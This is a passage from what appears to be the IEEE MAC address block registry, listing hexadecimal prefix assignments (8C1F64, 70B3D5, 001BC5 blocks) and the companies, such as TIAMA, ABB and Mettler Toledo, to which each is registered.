8C1F64367 LAMTEC Mess- und Regeltechnik für Feuerungen GmbH & Co. KG 8C1F64591 MB connect line GmbH Fernwartungssysteme 8C1F64F4C inomatic GmbH 8C1F64D7F Fiberstory communications Pvt Ltd 70B3D5FA0 TIAMA 70B3D58A1 TIAMA 8C1F645EB TIAMA 8C1F64723 Celestica Inc. 8C1F64C5D Alfa Proxima d.o.o. 8C1F64C06 Tardis Technology 8C1F644F7 SmartD Technologies Inc 8C1F64879 ASHIDA Electronics Pvt. Ltd 8C1F64056 DONG GUAN YUNG FU ELECTRONICS LTD. 8C1F64AC9 ShenYang LeShun Technology Co.,Ltd 8C1F64097 FoMa Systems GmbH 8C1F64B6E Loop Technologies 8C1F64963 Gogo Business Aviation 8C1F6408D NEETRA SRL SB 8C1F646B1 Specialist Mechanical Engineers (PTY)LTD 8C1F64369 Orbital Astronautics Ltd 8C1F64AFD Universal Robots A/S 8C1F649E2 Technology for Energy Corp 8C1F6438C XIAMEN ZHIXIAOJIN INTELLIGENT TECHNOLOGY CO., LTD 8C1F64733 Video Network Security 8C1F6461C Automata GmbH & Co. KG 8C1F64AF5 SANMINA ISRAEL MEDICAL SYSTEMS LTD 8C1F6463F PREO INDUSTRIES FAR EAST LTD 8C1F64852 ABB 8C1F64E86 ComVetia AG 8C1F649AB DAVE SRL 8C1F64C52 Invendis Technologies India Pvt Ltd 8C1F64187 Sicon srl 8C1F64F57 EA Elektro-Automatik 8C1F643B0 Flextronics International Kft 8C1F64F10 GSP Sprachtechnologie GmbH 8C1F6408E qiio AG 8C1F647B0 AXID SYSTEM 8C1F6415C TRON FUTURE TECH INC. 8C1F64D5B Local Security 8C1F6426E Koizumi Lighting Technology Corp. 8C1F64009 Converging Systems Inc. 8C1F64252 TYT Electronics CO., LTD 8C1F64AF0 MinebeaMitsumi Inc. 8C1F642A9 Elbit Systems of America, LLC 8C1F64387 OMNIVISION 8C1F642C6 YUYAMA MFG Co.,Ltd 8C1F6446A Pharsighted LLC 8C1F64354 Paul Tagliamonte 8C1F64366 MB connect line GmbH Fernwartungssysteme 8C1F64BCC Sound Health Systems 8C1F647E7 robert juliat 8C1F647E0 Colombo Sales & Engineering, Inc. 8C1F64FFC Invendis Technologies India Pvt Ltd 8C1F64D3A Applied Materials 70B3D5CB7 HKC Security Ltd. 8C1F64D20 NAS Engineering PRO 70B3D5119 YPP Corporation 8C1F6423D Mokila Networks Pvt Ltd 8C1F648E5 Druck Ltd. 8C1F642FB MB connect line GmbH Fernwartungssysteme 8C1F64306 Corigine,Inc. 70B3D5900 DCS Corp 8C1F647EE Orange Precision Measurement LLC 8C1F64739 Monnit Corporation 8C1F64C04 SANWA CORPORATION 8C1F6445B Beijing Aoxing Technology Co.,Ltd 8C1F648B9 Zynex Monitoring Solutions 8C1F64240 HuiTong intelligence Company 8C1F64AA8 axelife 8C1F64E62 Axcend 8C1F64AB7 MClavis Co.,Ltd. 8C1F645CB dinosys 8C1F646D5 HTK Hamburg GmbH 8C1F64098 Agvolution GmbH 8C1F647D8 HIROSAWA ELECTRIC Co.,Ltd. 8C1F64890 WonATech Co., Ltd. 8C1F648D5 Agramkow A/S 8C1F64092 Gogo BA 8C1F64C0E Goodtech AS dep Fredrikstad 8C1F641A5 DIALTRONICS SYSTEMS PVT LTD 8C1F64CDB EUROPEAN TELECOMMUNICATION INTERNATIONAL KFT 8C1F64F65 Talleres de Escoriaza SA 8C1F64817 nke marine electronics 8C1F646B9 GS Industrie-Elektronik GmbH 8C1F645AC YUYAMA MFG Co.,Ltd 8C1F6401A Paragraf 8C1F64A6A Sphere Com Services Pvt Ltd 8C1F64CCB suzhou yuecrown Electronic Technology Co.,LTD 8C1F647CF Transdigital Pty Ltd 8C1F64254 Zhuhai Yunzhou Intelligence Technology Ltd. 8C1F64AC0 AIQuatro 8C1F640C0 Active Research Limited 70B3D5401 Private 8C1F64D9A Beijing Redlink Information Technology Co., Ltd. 8C1F640E6 Cleanwatts Digital, S.A. 8C1F64672 Farmobile LLC 8C1F64CD9 Fingoti Limited 8C1F643B2 Real Digital 8C1F6422E Jide Car Rastreamento e Monitoramento LTDA 8C1F64FB7 Grace Design/Lunatec LLC 8C1F6428C Sakura Seiki Co.,Ltd. 8C1F64E64 Indefac company 8C1F64807 GIORDANO CONTROLS SPA 8C1F64045 VEILUX INC. 8C1F640AF FORSEE POWER 8C1F64F3C Microlynx Systems Ltd 8C1F64911 EOLANE 8C1F6412B Beijing Tongtech Technology Co., Ltd. 8C1F64641 biosilver .co.,ltd 8C1F646F9 ANDDORO LLC 8C1F64BC2 Huz Electronics Ltd 8C1F64429 Abbott Diagnostics Technologies AS 8C1F6409B Taiv 8C1F6469E AT-Automation Technology GmbH 8C1F64085 SORB ENGINEERING LLC 70B3D55E2 Grossenbacher Systeme AG 8C1F64224 PHB Eletronica Ltda. 8C1F649A6 INSTITUTO DE GESTÃO, REDES TECNOLÓGICAS E NERGIAS 8C1F64E61 Stange Elektronik GmbH 70B3D5556 OHASHI ENGINEERING CO.,LTD. 8C1F646FC HM Systems A/S 8C1F64FB0 MARIAN GmbH 8C1F644BB IWS Global Pty Ltd 8C1F644F0 Tieline Research Pty Ltd 8C1F649FE Metroval Controle de Fluidos Ltda 8C1F645BC HEITEC AG 8C1F64F32 Shenzhen INVT Electric Co.,Ltd 8C1F64454 KJ Klimateknik A/S 8C1F64498 YUYAMA MFG Co.,Ltd 8C1F648C4 Hermes Network Inc 70B3D587C Nautel LTD 8C1F64B10 MTU Aero Engines AG 8C1F64A32 Nautel LTD 8C1F64B97 Gemini Electronics B.V. 8C1F64E5D JinYuan International Corporation 8C1F640EA SmartSky Networks LLC 8C1F64747 VisionTIR Multispectral Technology 8C1F64298 Megger Germany GmbH 8C1F64071 DORLET SAU 8C1F648A4 Genesis Technologies AG 8C1F6445F Toshniwal Security Solutions Pvt Ltd 8C1F64956 Paulmann Licht GmbH 8C1F64B22 BLIGHTER SURVEILLANCE SYSTEMS LTD 8C1F647EC Methods2Business B.V. 8C1F64C01 HORIBA ABX SAS 8C1F64D56 Wisdom Audio 8C1F64535 Columbus McKinnon 8C1F643FE Plum sp. z.o.o. 8C1F641BB Renwei Electronics Technology (Shenzhen) Co.,LTD. 8C1F64F59 Inovonics Inc. 8C1F644EC XOR UK Corporation Limited 8C1F640F0 Xylon 8C1F64638 THUNDER DATA TAIWAN CO., LTD. 8C1F64909 MATELEX 8C1F641DA Chongqing Huaxiu Technology Co.,Ltd 8C1F64164 Revo - Tec GmbH 8C1F64DB5 victtron 8C1F646AD Potter Electric Signal Company 8C1F643FF UISEE(SHANGHAI) AUTOMOTIVE TECHNOLOGIES LTD. 8C1F64708 ZUUM 8C1F64FB1 ABB 8C1F64F9E DREAMSWELL Technology CO.,Ltd 8C1F64B82 Seed Core Co., LTD. 8C1F64619 Labtrino AB 8C1F649D8 Integer.pl S.A. 8C1F648EE Abbott Diagnostics Technologies AS 8C1F64C54 First Mode 8C1F64892 MDI Industrial 8C1F6466C LINEAGE POWER PVT LTD., 8C1F64398 Software Systems Plus 8C1F64F94 EA Elektroautomatik GmbH & Co. KG 8C1F6492A Thermo Onix Ltd 8C1F6454C Gemini Electronics B.V. 8C1F64B84 SPX Flow Technology 8C1F646E3 ViewSonic International Corporation 8C1F6460E ICT International 8C1F646AE Bray International 8C1F64712 Nexion Data Systems P/L 8C1F6473D NewAgeMicro 8C1F642EF Invisense AB 8C1F6495A Shenzhen Longyun Lighting Electric Appliances Co., Ltd 8C1F6490E Xacti Corporation 70B3D5C0C Tech4Race 8C1F64DC9 Peter Huber Kaeltemaschinenbau AG 8C1F64219 Guangzhou Desam Audio Co.,Ltd 8C1F64BA3 DEUTA-WERKE GmbH 8C1F64414 INSEVIS GmbH 8C1F64101 ASW-ATI Srl 8C1F64D29 Secure Bits 8C1F6425E R2Sonic, LLC 8C1F64CF3 ABB S.p.A. 8C1F64DFA ATSE LLC 8C1F642E3 Erba Lachema s.r.o. 8C1F64FE0 Potter Electric Signal Company 8C1F64144 Langfang ENN lntelligent Technology Co.,Ltd. 8C1F640E0 Autopharma 8C1F64B03 Shenzhen Pisoftware Technology Co.,Ltd. 8C1F643E8 Ruichuangte 8C1F64918 Abbott Diagnostics Technologies AS 8C1F64DBD GIORDANO CONTROLS SPA 70B3D5FFD i2Systems 70B3D5901 ATS-CONVERS,LLC 8C1F649FD Vishay Nobel AB 70B3D5450 Apantac LLC 70B3D52B6 HLT Micro 70B3D54CB Cucos Retail Systems GmbH 70B3D5318 Exemplar Medical, LLC 70B3D571F Grayshift 70B3D5A63 DesignA Electronics Limited 70B3D5AFD dongsheng 70B3D531E GILLAM-FEI S.A. 70B3D5ED6 Metrasens Limited 70B3D5451 Perform3-D LLC 70B3D56D4 Telerob Gesellschaft für Fernhantierungs 70B3D5312 SMITEC S.p.A. 70B3D5CFA SCHEIBER 70B3D5690 Sicon srl 70B3D53B3 Movicom Electric LLC 70B3D5A1E Monnit Corporation 70B3D5681 DEUTA-WERKE GmbH 70B3D5314 Grau Elektronik GmbH 70B3D5D2C microWerk GmbH 70B3D546D Guan Show Technologe Co., Ltd. 70B3D5604 Foxtrot Research Corp 70B3D5B58 INTERNET PROTOCOLO LOGICA SL 70B3D5FB4 Array Technologies Inc. 70B3D5390 TEX COMPUTER SRL 70B3D544C ejoin, s.r.o. 70B3D5D83 AKASAKATEC INC. 70B3D5B12 VTEQ 70B3D5AD0 REO AG 001BC5030 OctoGate IT Security Systems GmbH 70B3D5520 promedias AG 70B3D5887 Entec Solar S.L. 70B3D58E8 PREO INDUSTRIES FAR EAST LTD 70B3D5D78 Nxvi Microelectronics Technology (Jinan) Co., Ltd. 70B3D5527 Procon Electronics Pty Ltd 70B3D580E Utopi Ltd 70B3D5309 ABS Applied Biometric Systems GmbH 70B3D5BF0 Alfa Elettronica srl 70B3D58D1 Field Design Inc. 70B3D5B61 WuXi anktech Co., Ltd 70B3D5C57 eBZ GmbH 70B3D55F5 Microvision 70B3D5BBC Boundary Technologies Ltd 70B3D5B3F Orbit International 70B3D5D17 Power Element 70B3D5CDD Teneo IoT B.V. 70B3D5909 tetronik GmbH AEN 70B3D5AB1 ISRV Zrt. 70B3D5624 EBE Mobility & Green Energy GmbH 70B3D5380 SeaTech Intelligent Technology (Shanghai) Co., LTD 70B3D53C8 ABC Electric Co. 70B3D527B DAVE SRL 70B3D56C4 Veo Robotics, Inc. 70B3D5CBF Cubic ITS, Inc. dba GRIDSMART Technologies 70B3D5ED4 WILMORE ELECTRONICS COMPANY 70B3D5ED2 PCTEL, Inc. 70B3D5962 Senquire Pte. Ltd 70B3D5619 ZAO ZEO 70B3D58FB MB connect line GmbH Fernwartungssysteme 70B3D5738 GRYPHON SECURE INC 70B3D56EF Beringar 70B3D5247 Satsky Communication Equipment Co.,Ltd. 70B3D5483 LITUM BILGI TEKNOLOJILERI SAN. VE TIC. A.S. 70B3D5573 GEGA ELECTRONIQUE 70B3D57D8 Nuand LLC 70B3D59A3 Shanghai Hourui Technology Co., Ltd. 70B3D5B71 Optiver Pty Ltd 70B3D5FA4 Energybox Limited 70B3D59BB Jinga-hi, Inc. 70B3D50F5 Season Electronics Ltd 70B3D5A03 Proemion GmbH 70B3D54D7 Technological Ray GmbH 70B3D5E11 Engage Technologies 70B3D5B7B Doosan Digital Innovation America 70B3D568A Advanced Telecommunications Research Institute International 70B3D5622 PCS Inc. 70B3D5376 Magenta Labs, Inc. 70B3D549C AC Power Corp. 70B3D5386 GPSat Systems 70B3D5416 Antlia Systems 70B3D5055 BAE SYSTEMS 70B3D5A23 LG Electronics 70B3D5EDA Breas Medical AB 70B3D5762 Transformational Security, LLC 70B3D55A1 BOE Technology Group Co., Ltd. 70B3D5992 KAEONIT 70B3D5B54 Packet Power 70B3D56AC Ketronixs Sdn Bhd 70B3D5D0F Alto Aviation 70B3D5D19 Senior Group LLC 70B3D59C2 Sportsbeams Lighting, Inc. 70B3D55C9 ICTK Holdings 70B3D594C Honeywell/Intelligrated 70B3D5536 LARIMART SPA 70B3D5846 National Time & Signal Corp. 70B3D57D4 Computechnic AG 70B3D570C Potter Electric Signal Co. LLC 70B3D5D7D BESO sp. z o.o. 70B3D5B90 Amico Corporation 70B3D5165 Wuhan Xingtuxinke ELectronic Co.,Ltd 70B3D5AD9 aelettronica group srl 70B3D582A C W F Hamilton & Co Ltd 70B3D5294 RCH Vietnam Limited Liability Company 70B3D546A Shenzhen Vikings Technology Co., Ltd. 70B3D54E3 adnexo GmbH 70B3D5C23 Sumitomo Heavy Industries, Ltd. 70B3D573F LLC Open Converged Networks 70B3D510D CoreEL Technologies Pvt Ltd 70B3D5C18 Sanmina Israel 70B3D506D Panoramic Power 70B3D5669 Panoramic Power 70B3D52C1 Avlinkpro 70B3D55AC LM-Instruments Oy 70B3D5DBB Fuhr GmbH Filtertechnik 70B3D5C36 Knowledge Resources GmbH 70B3D55C6 C4I Systems Ltd 70B3D5683 DECYBEN 70B3D577F Microchip Technology Germany II GmbH&Co.KG 70B3D5A09 Smart Embedded Systems 70B3D5F6A Guan Show Technologe Co., Ltd. 70B3D5E24 Gogo Business Aviation 70B3D5AD4 INVISSYS 70B3D550F LLC Sarov Innovative Technologies (WIZOLUTION) 70B3D5A77 SPX Radiodetection 70B3D525C ARCLAN'SYSTEM 70B3D5C98 Trust Automation 70B3D518A NSP Europe Ltd 70B3D5249 Kospel S.A. 70B3D5233 RCH Vietnam Limited Liability Company 70B3D5F64 silicom 70B3D5466 SYLink Technologie 70B3D5699 Flextronics International Kft 70B3D54D3 Hefei STAROT Technology Co.,Ltd 70B3D5E12 SNK, Inc. 70B3D597D RCH Vietnam Limited Liability Company 70B3D5893 Cubitech 70B3D5EEB shenzhen suofeixiang technology Co.,Ltd 70B3D5335 Jonsa Australia Pty Ltd 70B3D5467 GreenWake Technologies 70B3D5940 Paradigm Technology Services B.V. 70B3D5DAE LGE 70B3D57DB aquila biolabs GmbH 70B3D5C82 Sicon srl 70B3D53EC Outsight SA 70B3D5F23 Lyse AS 70B3D597E Public Joint Stock Company Morion 70B3D5CFB Screen Innovations 70B3D59C3 Sevensense Robotics AG 70B3D52C4 Hodwa Co., Ltd 70B3D5117 SysCom Automationstechnik GmbH 70B3D55F7 JFA Electronics Industry and Commerce EIRELI 70B3D5858 Hubbell Power Systems 70B3D5DAC Dalian Laike Technology Development Co., Ltd 70B3D5964 Visility 70B3D5865 Insitu, Inc. 70B3D5E5C Walton Hi-Tech Industries Ltd. 70B3D5C31 German Power GmbH 70B3D5425 SinterCast 70B3D5B9D Conclusive Engineering 70B3D5487 ECS s.r.l. 70B3D5C3A HAN CHANG 70B3D5575 Konrad GmbH 70B3D5159 RCH Vietnam Limited Liability Company 70B3D5AB6 SmartD Technologies Inc 70B3D5617 Cominfo, Inc. 70B3D54C9 Elsist Srl 70B3D56EE HANKOOK CTEC CO,. LTD. 70B3D548B TATTILE SRL 70B3D54E4 W.A. Benjamin Electric Co. 70B3D58B8 GDI Technology Inc 70B3D5EE2 MONTRADE SPA 70B3D5A41 THELIGHT Luminary for Cine and TV S.L. 70B3D512A Elvys s.r.o 70B3D584F Mettler Toledo 70B3D574A Mettler Toledo 70B3D5D64 Mettler Toledo 70B3D5EFD Cambridge Technology, Inc. 70B3D5CC4 Benchmark Electronics BV 70B3D5B87 CAITRON GmbH 70B3D5B25 Hifocus Electronics India Private Limited 70B3D5DBD TRANSLITE GLOBAL LLC 70B3D52B8 WideNorth AS 70B3D5CEF Ellego Powertec Oy 70B3D500B AXING AG 70B3D50CB NIRECO CORPORATION 70B3D51D2 Xacti Corporation 70B3D5A8A JSC VIST Group 70B3D547B Monixo 70B3D55B4 Systems Technologies 70B3D59E8 Zerospace ICT Services B.V. 70B3D506E GLOBAL-KING INTERNATIONAL CO., LTD. 70B3D56DD Abbott Diagnostics Technologies AS 70B3D5AED Cubitech 70B3D50D5 Kahler Automation 70B3D5B5B DynaMount LLC 70B3D545A Palarum LLC 70B3D54F7 Foxtel srl 70B3D542B Guangzhou Haoxiang Computer Technology Co.,Ltd. 70B3D5830 Nordson Corporation 70B3D59E1 Bolide Technology Group, Inc. 70B3D5ECC Digifocus Technology Inc. 70B3D5BF8 RCH ITALIA SPA 70B3D541F Orion S.r.l. 70B3D5320 CYNIX Systems Inc 70B3D5B84 OOO Research and Production Center "Computer Technologies" 70B3D57CA Hunan Shengyun Photoelectric Technology Co., Ltd. 70B3D5F44 Magneti Marelli S.p.A. Electronics 70B3D5E06 System West dba ICS Electronics 70B3D5218 Gremesh.com 70B3D5206 ard sa 70B3D5358 Nevotek 70B3D5053 YAMAKATSU ELECTRONICS INDUSTRY CO., LTD. 70B3D55B2 Peter Huber Kaeltemaschinenbau AG 70B3D5D02 Arctos Showlasertechnik GmbH 70B3D5DC1 Metralight, Inc. 70B3D5C59 R Cubed Engineering, LLC 70B3D5BC0 SENSO2ME 70B3D58EA JLCooper Electronics 70B3D5983 ENS Engineered Network Systems 70B3D54D6 Operational Technology Solutions 70B3D5337 Laborie 70B3D583E The Dini Group, La Jolla inc. 70B3D5A70 Gateview Technologies 70B3D5521 Selex ES Inc. 70B3D5B65 Rotem Industry LTD 70B3D5CD7 AutomationX GmbH 70B3D5BE7 Syscom Instruments SA 70B3D5068 Onethinx BV 70B3D54A4 DEUTA-WERKE GmbH 70B3D5093 Legrand Electric Ltd 70B3D5D49 Sicon srl 70B3D57A2 Alpha ESS Co., Ltd. 70B3D56FE NTO IRE-POLUS 70B3D5DFE microtec Sicherheitstechnik GmbH 70B3D54CC FRESENIUS MEDICAL CARE 70B3D531D AVA Monitoring AB 70B3D5D8A JIANGSU HORAINTEL CO.,LTD 70B3D505B PAL Inc. 70B3D56F1 Discover Battery 70B3D55A6 TimeMachines Inc. 70B3D5EAD Cobo, Inc. 70B3D5C08 Talleres de Escoriaza SA 70B3D59B7 Itronics Ltd 70B3D5FDC Tapdn 70B3D5DBC Gamber Johnson-LLC 70B3D5BA8 Controlled Power Company 70B3D579D Editech Co., Ltd 70B3D5788 Slan 70B3D5603 EGISTECH CO.,LTD. 70B3D5533 Nippon Marine Enterprises, Ltd. 70B3D5FED Niron systems & Projects 70B3D5AEC Paratec Ltd. 70B3D561B Nubewell Networks Pvt Ltd 70B3D5D36 Insitu Inc. 70B3D52E1 hiSky S.C.S LTD 70B3D59B9 Aethera Technologies 70B3D584B QuestHouse, Inc. 70B3D5020 MICRO DEBUG, Y.K. 70B3D59FD amakidenki 70B3D5447 Avid Controls Inc 001BC50B8 Private 70B3D5CDC Dat-Con d.o.o. 70B3D5D00 DKI Technology Co., Ltd 70B3D5A2D Project Service S.r.l. 70B3D5A9B OSMOZIS 70B3D59D6 Crown Solar Power Fencing Systems 70B3D5FD0 Alcohol Countermeasure Systems 70B3D5DBE Hiber 70B3D5AA5 MB connect line GmbH Fernwartungssysteme 70B3D5E8C Fracarro srl 70B3D5239 Applied Silver 70B3D5A75 Taejin InfoTech 70B3D51EE MEGGITT 70B3D5A7D Prior Scientific Instruments Ltd 70B3D52E9 NeurIT s.r.o. 70B3D5DAB SET Power Systems GmbH 70B3D5BC4 Digital Media Professionals 70B3D5072 Lightdrop 70B3D51D8 Blue Skies Global LLC 70B3D5098 Alcodex Technologies Private Limited 70B3D559B AUTOMATIZACION Y CONECTIVIDAD SA DE CV 70B3D522A Shishido Electrostatic, Ltd. 70B3D5BD6 Consarc Corporation 70B3D505C Amber Kinetics Inc 70B3D5802 Qingdao CNR HITACH Railway Signal&communication co.,ltd 70B3D5B10 Zumbach Electronic AG 70B3D5C4C VTC Digicom 70B3D5BB0 WICELL TECHNOLOGY 70B3D545B KOMZ - IZMERENIYA 70B3D5B38 GoTrustID Inc. 70B3D5E0C Communication Systems Solutions 70B3D515B Armstrong International, Inc. 001BC5015 Corporate Systems Engineering 70B3D5AE6 Ya Batho Trading (Pty) Ltd 70B3D58DA MicroElectronics System Co.Ltd 70B3D5441 Videoport S.A. 70B3D5402 AKIS technologies 70B3D5978 Satixfy Israel Ltd. 70B3D5B49 ANALOGICS TECH INDIA LTD 70B3D5E84 ENTEC Electric & Electronic Co., LTD. 70B3D5338 Opti-Sciences, Inc. 70B3D5B66 Silent Gliss International Ltd 70B3D5977 Engage Technologies 70B3D5759 AML 70B3D5F27 NIRIT- Xinwei Telecom Technology Co., Ltd. 70B3D5516 LINEAGE POWER PVT LTD., 70B3D51EA Sense For Innovation 70B3D58D7 Schneider Electric Motion USA 70B3D59DF DOBE Computing 70B3D53A1 Reckeen HDP Media sp. z o.o. sp. k. 70B3D5B4D Avidbots Corporation 70B3D5FDD Laser Imagineering Vertriebs GmbH 70B3D5673 ACD Elekronik GmbH 70B3D576C Aural Ltd 70B3D5636 Globalcom Engineering SPA 70B3D5280 Computech International 70B3D5235 CAMEON S.A. 70B3D52B2 Sun Creative (ZheJiang) Technology INC. 70B3D556A Harvard Technology Ltd 70B3D5DA5 Roboteq 70B3D5764 SCHMID electronic 70B3D5680 BASF Corporation 70B3D553D ACCEL CORP 70B3D53F7 Advansid 70B3D5F84 DEUTA-WERKE GmbH 70B3D526C EA Elektroautomatik GmbH & Co. KG 70B3D5C05 KST technology 001BC5032 Osborne Coinage Co 001BC50B6 VEILUX INC. 70B3D585F YUYAMA MFG Co.,Ltd 70B3D56F7 EGICON SRL 70B3D5706 Smith Meter, Inc. 70B3D59AB Groupe Paris-Turf 70B3D5E43 SL Audio A/S 70B3D5161 MB connect line GmbH Fernwartungssysteme 70B3D5B4A MEDEX 70B3D5F14 SANYU SWITCH CO., LTD. 70B3D5D2E Coheros Oy 70B3D5CE2 Centero 70B3D5B1E Fen Systems Ltd 70B3D5876 IONETECH 70B3D506F Beijing Daswell Science and Technology Co.LTD 70B3D5770 STREGA 70B3D5985 Burk Technology 70B3D5105 Beijing Nacao Technology Co., Ltd. 70B3D5EEC Impolux GmbH 70B3D5DA6 Redfish Group Pty Ltd 70B3D5FEA Heng Dian Technology Co., Ltd 70B3D5B7F JSK System 70B3D5DC8 Enertex Bayern GmbH 70B3D5073 Liteon Technology Corporation 70B3D587D INVIXIUM ACCESS INC. 70B3D55F2 Invisible Systems Limited 70B3D5240 Orlaco Products B.V. 70B3D5EBC Refine Technology, LLC 70B3D564B Kalfire 70B3D5790 AVI Pty Ltd 70B3D5455 Heartlandmicropayments 70B3D5C65 PEEK TRAFFIC 70B3D5DB1 Biovigil Hygiene Technologies 70B3D5532 Talleres de Escoriaza SA 70B3D5154 Walk Horizon Technology (Beijing) Co., Ltd. 70B3D5F19 Vitro Technology Corporation 70B3D5F10 Riegl Laser Measurement Systems GmbH 70B3D51A6 Robotelf Technologies (Chengdu) Co., Ltd. 70B3D56C1 R.A.I.T.88 Srl 70B3D5141 M.T. S.R.L. 70B3D5728 BCD Audio 70B3D523A Mesa Labs, Inc. 70B3D5DF1 CoXlab Inc. 70B3D593E Systems With Intelligence Inc. 70B3D5739 Zigencorp, Inc 70B3D5FF0 E-MetroTel 70B3D5469 Gentec Systems Co. 70B3D50D4 Guangzhou Male Industrial Animation Technology Co.,Ltd. 70B3D564E BigStuff3, Inc. 70B3D5EF5 DEUTA-WERKE GmbH 70B3D5253 Wimate Technology Solutions Private Limited 70B3D5D5F Core Balance Co., Ltd. 70B3D51CD ELEUSI GmbH 001BC50C2 TechSolutions A/S 70B3D5AD8 Euklis by GSG International 70B3D5024 G+D Mobile Security 70B3D555C Saratoga Speed, Inc. 70B3D5DAA AmTote Australasia 70B3D5904 PHB Eletronica Ltda. 70B3D5213 ETON Deutschland Electro Acoustic GmbH 70B3D50F8 Special Services Group, LLC 70B3D5B64 OSUNG LST CO.,LTD. 70B3D5C8F TRIDENT INFOSOL PVT LTD 70B3D56E9 Krontech 70B3D5AC1 AEM Singapore Pte. Ltd. 70B3D5E69 Fire4 Systems UK Ltd 70B3D52B7 Matrix Orbital Corporation 70B3D5FA3 ELVA-1 MICROWAVE HANDELSBOLAG 70B3D5743 EA Elektroautomatik GmbH & Co. KG 70B3D53B5 Preston Industries dba PolyScience 70B3D57EA Waterkotte GmbH 70B3D59E6 BLOCKSI LLC 70B3D524F ELBIT SYSTEMS BMD AND LAND EW - ELISRA LTD 70B3D57BF Stone Three 70B3D55DA Valk Welding B.V. 70B3D5E3A Cyanview 70B3D5304 Wartsila Voyage Limited 70B3D5075 Mo-Sys Engineering Ltd 70B3D5351 KST technology 70B3D5689 Prisma Telecom Testing Srl 70B3D58C8 KRONOTECH SRL 70B3D56FD Core Akıllı Ev Sistemleri 70B3D5D41 KSE GmbH 70B3D5B3A Adigitalmedia 70B3D52CC WeWork Companies, Inc. 70B3D560D Link Electric & Safety Control Co. 70B3D581B bobz GmbH 70B3D5B6C GHM-Messtechnik GmbH (Standort IMTRON) 70B3D5096 HAVELSAN A.Ş. 70B3D5963 Triax A/S 70B3D5C6C McQ Inc 70B3D5723 LG Electronics 70B3D5EA6 Galios 70B3D5C4D RADA Electronics Industries Ltd. 70B3D5E88 Breas Medical AB 70B3D595C Wilson Electronics 70B3D5760 QUALITTEQ LLC 70B3D5828 Xacti Corporation 70B3D52BD mg-sensor GmbH 70B3D59B5 Ideetron b.v. 70B3D5705 Digital Matter Pty Ltd 70B3D592B ENTEC Electric & Electronic Co., LTD. 70B3D5894 UnI Systech Co.,Ltd 70B3D5DE6 MB connect line GmbH Fernwartungssysteme 70B3D5727 LP Technologies Inc. 70B3D52F2 Health Care Originals, Inc. 70B3D58F8 Wi6labs 70B3D5E3F BESTCODE LLC 70B3D5133 Vidisys GmbH 70B3D5254 Spectrum Brands 70B3D51E6 Sanmina Israel 70B3D5826 Elbit Systems of America 70B3D52AB NASA Johnson Space Center 70B3D5EB9 Thiel Audio Products Company, LLC 70B3D56E8 Blu Wireless Technology Ltd 70B3D5844 SANSFIL Technologies 70B3D54A5 Intermind Inc. 70B3D5D98 ACD Elekronik GmbH 70B3D5FF8 Dutile, Glines and Higgins Corporation 70B3D55BF Aton srl 70B3D56AD CONNIT 70B3D5125 Securolytics, Inc. 70B3D558C OPTSYS 70B3D5C33 Dandong Dongfang Measurement & Control Technology Co., Ltd. 70B3D50D3 TSAT AS 70B3D5CC8 PROFEN COMMUNICATIONS 70B3D5D69 Thermo Fisher Scientific 70B3D556B S.E.I. CO.,LTD. 70B3D5807 Camsat Przemysław Gralak 70B3D5D4C Elystec Technology Co., Ltd 70B3D5C20 Mipot S.p.a. 70B3D5DA4 CRDE 70B3D57F3 Shenzhen Virtual Clusters Information Technology Co.,Ltd. 70B3D5C79 MB connect line GmbH Fernwartungssysteme 70B3D5EE3 Lithe Technology, LLC 70B3D50A0 Cominfo, Inc. 70B3D52D0 ijin co.,ltd. 70B3D59C1 Zeroplus Technology Co.,Ltd. 70B3D5967 TATTILE SRL 70B3D5C17 Potter Electric Signal Co. LLC 70B3D5BF6 comtac AG 70B3D5AA3 LINEAGE POWER PVT LTD., 70B3D5763 A Trap, USA 70B3D5F25 JSC “Scientific Industrial Enterprise "Rubin" 70B3D5D8E Axatel SrL 70B3D5F0C ModulaTeam GmbH 70B3D5E59 Fracarro srl 70B3D5A28 PEEK TRAFFIC 70B3D59DC Shanghai Daorech Industry Developmnet Co.,Ltd 70B3D5138 SMITEC S.p.A. 70B3D50B0 Raven Systems Design, Inc 70B3D5C74 Qtechnology A/S 70B3D53F3 SPEA SPA 70B3D5F37 Mitsubishi Electric Micro-Computer Application Software Co.,Ltd. 70B3D502E Monnit Corporation 70B3D5F1D Critical Link LLC 70B3D585E XLOGIC srl 70B3D5902 Unlimiterhear co.,ltd. taiwan branch 70B3D57A1 Excelfore Corporation 70B3D5630 LGE 70B3D5D08 Veeco Instruments 70B3D5FFC Symetrics Industries d.b.a. Extant Aerospace 70B3D598C University of Wisconsin Madison - Department of High Energy Physics 70B3D5FAF Radig Hard & Software 70B3D54CF GREEN HOUSE CO., LTD. 70B3D55CA ACD Elekronik GmbH 70B3D5FA7 Nordson Corporation 70B3D51DE DYCEC, S.A. 70B3D50EF Dextera Labs 70B3D537C Merus Power Dynamics Ltd. 70B3D5C2E Triax A/S 70B3D55E5 HAIYANG OLIX CO.,LTD. 70B3D50A1 PTN Electronics Limited 70B3D5880 Skopei B.V. 70B3D560B Edgeware AB 70B3D59F6 Edgeware AB 70B3D5F83 Tata Communications Ltd. 70B3D5173 National TeleConsultants LLC 70B3D5267 Zehntner Testing Instruments 70B3D5D25 ENGenesis 70B3D5E67 APPLIED PROCESSING 70B3D5039 DoWoo Digitech 70B3D520D Engage Technologies 70B3D5D55 WM Design s.r.o 70B3D5542 RTDS Technologies Inc. 70B3D5E98 JSC Kaluga Astral 70B3D5149 eleven-x 70B3D5952 REQUEA 70B3D516F NimbeLink Corp 70B3D5563 Zhejiang Hao Teng Electronic Technology Co., Ltd. 70B3D58C2 F-domain corporation 70B3D5597 VAPE RAIL INTERNATIONAL 70B3D5188 Birket Engineering 70B3D55C1 Shanghai JaWay Information Technology Co., Ltd. 70B3D5BE9 Telecast Inc. 70B3D56D0 Code Blue Corporation 70B3D55D5 CT Company 70B3D5850 REO AG 70B3D5462 EarTex 70B3D504B Dream I System Co., Ltd 70B3D5C3E DOSADORES ALLTRONIC 70B3D581E Novathings 70B3D5C0F Honeywell Safety Products USA, Inc 70B3D50E5 Delta Solutions LLC 70B3D511F Geppetto Electronics 70B3D5BCC MB connect line GmbH Fernwartungssysteme 70B3D57E1 Applied Materials 70B3D5833 Alpiq InTec Management AG 70B3D52AC New Imaging Technologies 70B3D5ACD CRDE 70B3D5B77 Motec Pty Ltd 70B3D51DB Hudson Robotics 70B3D5AB0 OSR R&D ISRAEL LTD 70B3D519E J-Factor Embedded Technologies 70B3D509F COMTECH Kft. 70B3D5012 KST technology 70B3D5910 Eginity, Inc. 70B3D57D1 Schneider 